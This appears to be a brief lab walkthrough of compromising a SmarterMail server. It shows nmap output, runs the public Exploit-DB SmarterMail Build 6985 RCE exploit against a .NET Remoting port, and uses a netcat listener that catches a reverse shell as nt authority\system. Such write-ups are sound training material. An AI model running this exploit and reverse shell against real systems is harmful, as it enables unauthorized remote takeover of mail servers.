SmarterMail + .Net Remote

Initial Detection:

9998/tcp  open  http          syn-ack ttl 127 Microsoft IIS httpd 10.0
| uptime-agent-info: HTTP/1.1 400 Bad Request\x0D
| Content-Type: text/html; charset=us-ascii\x0D
| Server: Microsoft-HTTPAPI/2.0\x0D
| Date: Wed, 13 Jul 2022 16:16:02 GMT\x0D
| Connection: close\x0D
| Content-Length: 326\x0D
| \x0D
| <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN""http://www.w3.org/TR/html4/strict.dtd">\x0D
| <HTML><HEAD><TITLE>Bad Request</TITLE>\x0D
| <META HTTP-EQUIV="Content-Type" Content="text/html; charset=us-ascii"></HEAD>\x0D
| <BODY><h2>Bad Request - Invalid Verb</h2>\x0D
| <hr><p>HTTP Error 400. The request verb is invalid.</p>\x0D
|_</BODY></HTML>\x0D
| http-title: Site doesn't have a title (text/html; charset=utf-8).
|_Requested resource was /interface/root
|_http-server-header: Microsoft-IIS/10.0
| http-methods: 
|_  Supported Methods: GET HEAD POST OPTIONS
|_http-favicon: Unknown favicon MD5: 9D7294CAAB5C2DF4CD916F53653714D5
17001/tcp open  remoting      syn-ack ttl 127 MS .NET Remoting services

Notice port 17001 running the .NET Remoting Endpoint.

SmarterMail Build 6985 - Remote Code ExecutionExploit Database

This is what we needed for the exploit to work.

Modify our exploit to our listener and our ip.

python3 /usr/share/exploitdb/exploits/windows/remote/49216.py

##OUR KALI
╰─ nc -lvnp 4444              
listening on [any] 4444 ...
connect to [192.168.49.105] from (UNKNOWN) [192.168.105.65] 49849
whoami
nt authority\system

PreviousArgus Surveillance DVR 4.0 NextH2 Web Console

Last updated 3 years ago

hashtagInitial Detection:

Initial Detection: